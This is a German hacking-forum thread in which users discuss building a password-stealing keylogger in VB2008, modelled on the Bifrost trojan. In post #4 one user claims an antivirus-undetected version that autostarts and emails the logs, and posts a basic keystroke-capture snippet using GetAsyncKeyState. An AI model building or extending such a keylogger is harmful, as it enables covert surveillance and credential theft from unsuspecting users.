Ergebnis 1 bis 7 von 7
  1. #1
    Bad Times Virus Avatar von Solaro
    Registriert seit
    02.10.2008
    Beiträge
    508

    Lächeln Keylogger basteln in vb2008 Partner gesucht:P

    Hey ich bins wieder mal , schoen das das Forum jetzt si geil aussieht
    Bin grade in Thailand werde in 2 Wochen wieder kommen und wollte dan einen sehr guten Keylogger schreiben nur finde aleine machen Projekte net so den fun deshalb suche ich jemand der auch lust hat .
    Waere ganz gut wenn ihr natuerlich erfahrung mit vb2008 habt und viele kontakt moeglichkeiten wie skype msn icq .
    schreibt einfach mal rein kann auch gerne n gruppen Projekt werden . Wie habe ich mir das Vorgstestellt ?
    Also is sozusagen n bissi wie Bifrost man kann halt n einfach aber guten Keylogger bauen , ftp daten oder sowas angeben und dan halt eventuel auch ein fenster mit conections wo dan alle pws drinne sind .
    Habe schonmal ein gebaut der gefunzt hat nur problem war schlechter code z.b. der text : hallo , wie gehts euch . waere da HALLO 3|4 WIE GEHTS ACH. und viele bustaben weg usw naja halt schnell gemacht xD. Hoffe hat wer bock schreibt mal unten rein bin auch feur ideen offen
    mfg Kevin

  2. #2
    W32.SwineFlu Avatar von Sirect
    Registriert seit
    24.07.2008
    Beiträge
    1.916

    Standard

    Wenn du dich gut auskennst dann gerne, habe keine Lust darauf das ich alles machen muss.

  3. #3
    Bad Times Virus Avatar von Solaro
    Registriert seit
    02.10.2008
    Beiträge
    508

    Standard

    denke doch das es np wird , wenn du ne idee hast auc hschon zum code dan schick mir mal ne pm

  4. #4
    Anfänger
    Registriert seit
    13.11.2008
    Beiträge
    10

    Standard

    koennte dir helfen habe einen fertig gestellt ... der ud ist ... bei virustotal.com wird kein virus angezeigt logs werden nach systemstart (durch nen autostart des programmes) an e-mail gesendet

    Code:
    Public Class Form1
        Dim result As Integer
        Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
        Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
            Timer1.Start()
        End Sub
    
        Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
            For i = 1 To 255
                result = 0
                result = GetAsyncKeyState(i)
                If result = -32767 Then
                    TextBox1.Text = TextBox1.Text + Chr(i)
                End If
            Next i
        End Sub
    End Class
    das wird dir sicherlich helfen
    Geändert von FR3AK (21.02.2009 um 02:30 Uhr) Grund: Automerged Doublepost

    Code:
    Dim Idiot As String

  5. #5
    Fortgeschrittener
    Registriert seit
    13.07.2008
    Beiträge
    30

    Standard

    FR3Ak, den hast NICHT du geschrieben! Den gibts auf vielen Boards. Außerdem, fängt der Code jedes Signal ab. Das heist, auch Maus Signale. Der "Keylogger" ist noch lange nicht fertig! Du musst sehr viele Zeichen filtern. Du brauchst lediglich "Abc...", "0-9", und ein paar Sonderzeichen wie "!,?,=,"",&,/,(),.....".

  6. #6
    Bad Times Virus Avatar von Solaro
    Registriert seit
    02.10.2008
    Beiträge
    508

    Standard

    Müsst ihr uralte Threads aufwerfen ? in der Zeit habe ich schon selber längst nen v tut gemacht xD
    mfg kevin14w.

  7. #7
    Bugbear Wurm
    Registriert seit
    29.09.2008
    Beiträge
    237

    Standard

    Naja, dein Tutorial ist aber mal ehrlich gesagt nutzlos. Du wolltest drei Parts hochladen, den zweiten lädst du seit dem 22.03.2009 hoch. Du antwortest nicht auf privat Nachrichten und schaust nicht mehr in den Thread, kein schönes Tutorial.

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •